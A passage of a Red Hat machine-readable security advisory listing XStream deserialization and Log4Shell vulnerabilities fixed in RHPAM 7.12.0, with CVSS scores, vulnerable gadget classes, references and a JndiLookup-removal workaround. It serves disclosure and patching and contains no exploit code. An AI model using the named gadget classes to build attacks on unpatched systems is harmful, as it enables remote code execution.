"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapSearchEnumeration" }, { "cve": "CVE-2021-39148", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", 
"ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997781" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.toolkit.dir.ContextEnumerator", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39148" }, { "category": "external", "summary": "RHBZ#1997781", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997781" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39148", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39148" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39148", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39148" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-qrx8-8545-4wg2", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-qrx8-8545-4wg2" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe 
References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.toolkit.dir.ContextEnumerator" }, { "cve": "CVE-2021-39149", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997784" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.corba.*", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. 
XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39149" }, { "category": "external", "summary": "RHBZ#1997784", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997784" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39149", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39149" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39149", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39149" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-3ccq-5vw3-2p6x", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-3ccq-5vw3-2p6x" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended 
to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.corba.*" }, { "cve": "CVE-2021-39150", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997786" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to request data from internal resources that are not publicly available by manipulating the processed input stream with Java runtime versions 14 to 8. 
The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Server-side request forgery (SSRF) via unsafe deserialization of com.sun.xml.internal.ws.client.sei.*", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. If you rely on XStream\u0027s default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.18.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39150" }, { "category": "external", "summary": "RHBZ#1997786", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997786" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39150", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39150" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39150", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2021-39150" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-cxfm-5m4g-x7xp", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-cxfm-5m4g-x7xp" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Server-side request forgery (SSRF) via unsafe deserialization of com.sun.xml.internal.ws.client.sei.*" }, { "cve": "CVE-2021-39151", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997791" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML 
and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\n\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39151" }, { "category": "external", "summary": "RHBZ#1997791", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997791" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39151", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39151" }, { "category": "external", "summary": 
"https://nvd.nist.gov/vuln/detail/CVE-2021-39151", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39151" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-hph2-m3g5-xxv4", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-hph2-m3g5-xxv4" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration" }, { "cve": "CVE-2021-39152", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997793" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, 
a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to request data from internal resources that are not publicly available by manipulating the processed input stream with Java runtime versions 14 to 8. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Server-side request forgery (SSRF) via unsafe deserialization of jdk.nashorn.internal.runtime.Source$URLData", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. If you rely on XStream\u0027s default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.18.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. 
Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\n\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39152" }, { "category": "external", "summary": "RHBZ#1997793", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997793" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39152", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39152" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39152", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39152" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server 
process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Server-side request forgery (SSRF) via unsafe deserialization of jdk.nashorn.internal.runtime.Source$URLData" }, { "cve": "CVE-2021-39153", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997795" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. 
XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39153" }, { "category": "external", "summary": "RHBZ#1997795", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997795" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39153", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39153" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39153", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39153" }, { "category": "external", "summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-2q8x-2p7f-574v", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-2q8x-2p7f-574v" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended 
to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl" }, { "cve": "CVE-2021-39154", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2021-08-23T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1997801" } ], "notes": [ { "category": "description", "text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. 
The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue", "title": "Vulnerability summary" }, { "category": "other", "text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-39154" }, { "category": "external", "summary": "RHBZ#1997801", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997801" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-39154", "url": "https://www.cve.org/CVERecord?id=CVE-2021-39154" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39154", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39154" }, { "category": "external", "summary": 
"https://github.com/x-stream/xstream/security/advisories/GHSA-6w62-hx7r-mw68", "url": "https://github.com/x-stream/xstream/security/advisories/GHSA-6w62-hx7r-mw68" } ], "release_date": "2021-08-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue" }, { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. 
A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. 
This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.12.0" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": 
"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-26T15:52:53+00:00", "details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "RHPAM 7.12.0" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0296" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. 
For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "RHPAM 7.12.0" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "RHPAM 7.12.0" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Low" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5126
Vulnerability from csaf_redhat
Notes
